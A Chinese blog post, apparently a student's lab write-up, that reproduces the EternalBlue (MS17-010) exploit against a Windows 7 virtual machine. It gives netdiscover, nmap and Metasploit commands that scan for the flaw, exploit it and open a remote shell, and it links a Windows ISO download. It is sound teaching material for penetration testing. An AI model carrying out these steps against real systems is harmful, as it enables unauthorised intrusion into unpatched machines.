永恒之蓝漏洞复现

最新推荐文章于 2024-05-20 17:16:41 发布
最新推荐文章于 2024-05-20 17:16:41 发布
阅读量2.8k 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62314360/article/details/121985144
版权

复现环境:

Kali、windows7x64虚拟机

win7虚拟机镜像迅雷下载链接:

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

打开Kali扫描同网段IP:

netdiscover -r 192.168.38.0/24

然后用nmap对win7ip进行操作系统等信息进行扫描,看看其445端口是否打开,是否为64位操作系统。

nmap -O 192.168.38.133

 也可以直接打开msfconsole:

搜索永恒之蓝模块: search ms17_010

search ms17_010

我们这里使用第三个模块,目的是扫描win7系统是否存在该漏洞

use 3
set rhosts 192.168.38.133
run

 

 

如图所示则说明该漏洞可以被我们所利用,第一个扫描环节结束,下面开始漏洞利用的环节

同样的步骤,另外开一个命令终端,打开msfconsole,然后search ms17_010,然后use 0,使用第0个模块,show options , set rhosts 192.168.38.133

 

 run之后如果成功就可以看见有个WIN的标识:

拿shell的指令:

shell

 

 输入ipconfig查看win7的IP地址:

 到这里本次漏洞复现就完成了,因为太多人都复现这个漏洞,导致交作业的时候被老师骂了,都做完了总不能删了吧,那就发篇博客吧。下次发表CVE-2019-0232的详细复现过程

 

无名散修
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之蓝漏洞检测工具
10-10
永恒之蓝漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,...
永恒之蓝漏洞复现(详细版)
Zqinglele的博客
03-20 1533
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。
渗透测试基础之永恒之蓝漏洞复现
weixin_72543266的博客
09-08 1125
渗透测试(Penetration Testing)是指专业的安全测试人员模拟黑客攻击的行为,对目标系统进行主动攻击测试的过程。通过模拟攻击,渗透测试帮助企业评估其系统或网络的安全性,发现潜在的安全漏洞和弱点,从而提供相应的防护措施和改进建议。渗透测试的目的是帮助组织发现和修复系统中的安全漏洞,以提升安全性和防御能力。每日一言。
永恒之蓝漏洞复现及防御
wangmenghang的博客
08-29 362
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经济人)公布一大批网络攻击工具、期中包含永恒之蓝工具,“永恒之蓝”利用windows系统的链接:SMB漏洞可以获取漏洞最高权限。5月12日,不法份子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高兴内网、大型企业内网和政府机关中招,被勒索支付高额赎金才能恢复文件。
永恒之蓝漏洞复现(ms17-010)
热门推荐
yy
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
永恒之蓝漏洞扫描工具官方版
08-06
可以批量扫描局域网内存在永恒之蓝漏洞的工具,比某安工具强大N倍
永恒之蓝漏洞演示
12-22
利用kali linux在windows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂
PHP开发的医院安全(不良)事件系统源码 医院不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
爱笑的源码博客
05-14 976
医疗安全不容忽视! 医疗不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 136
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 366
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
如何确保您的Token安全:防范常见威胁与最佳实践
fudaihb的博客
05-14 968
Token安全是网络安全领域的一个重要方面,尤其是在现代应用程序中,token常常用于身份验证和会话管理。本文将探讨如何保护token不受常见威胁的侵害,并提供一些最佳实践来增强token的安全性。
智慧园区EasyCVR视频智能管理方案:构建高效安全园区新视界
TSINGSEE青犀视频官方技术博客
05-15 471
睡岗离岗检测:检测消控室值班员值岗情况,当发生脱岗、睡岗等问题时,即时报警,避免发生事件无人响应情形。
Web应用防火墙的重要性
最新发布
XRY_XIAO的博客
05-20 403
Web应用防火墙的重要性
家用充电桩远程监控安全管理系统解决方案
蓝蜂物联网
05-15 277
本方案旨在通过先进的物联网技术、云计算、大数据分析以及人工智能等科技手段,构建一个集实时监测、异常预警、故障诊断、数据统计、远程控制于一体的智能化平台,确保充电桩的安全运行及用户充电过程的便捷性与安全性。综上所述,家用充电桩远程监控安全管理系统解决方案深度融合物联网、云计算、大数据分析和人工智能等前沿技术,实现了充电桩的精细化、智能化管理,不仅提升了用户充电体验,降低了运维成本,也为能源管理的智能化转型注入了强大动力,具有显著的社会效益和经济效益。家用充电桩远程监控安全管理系统解决方案。
DDoS攻击揭秘与网站防护策略
网络安全服务提供商
05-14 760
DDoS攻击(分布式拒绝服务攻击)是一种利用大量被控制的计算机或智能设备(如僵尸网络)对目标网站或服务器发起大量无效请求或数据流量,从而导致目标系统资源耗尽、服务崩溃或无法处理正常请求的攻击方式。这种攻击通常是由一个或多个攻击者发起,他们通过控制大量被感染的计算机或设备,向目标系统发送大量看似正常的请求或数据,但实际上是为了消耗目标系统的资源,使其无法为正常用户提供服务。同时,还需要注意定期更新和修补系统漏洞、限制对敏感数据的访问以及加强员工安全意识培训等方面的工作。
永恒之蓝漏洞复现流程
09-01
- *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值